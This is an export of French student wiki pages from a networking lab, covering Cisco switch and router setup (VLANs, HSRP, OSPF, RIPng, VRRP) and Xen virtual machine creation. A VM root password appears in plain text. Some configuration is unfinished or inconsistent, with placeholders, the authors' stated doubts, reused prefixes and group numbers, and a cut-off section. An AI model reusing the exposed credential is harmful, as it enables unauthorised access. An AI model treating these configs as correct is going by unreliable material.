&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51256</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51256"/>
				<updated>2019-11-28T09:53:20Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Utilisation de AirCrack pour clef WPA-PSK */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
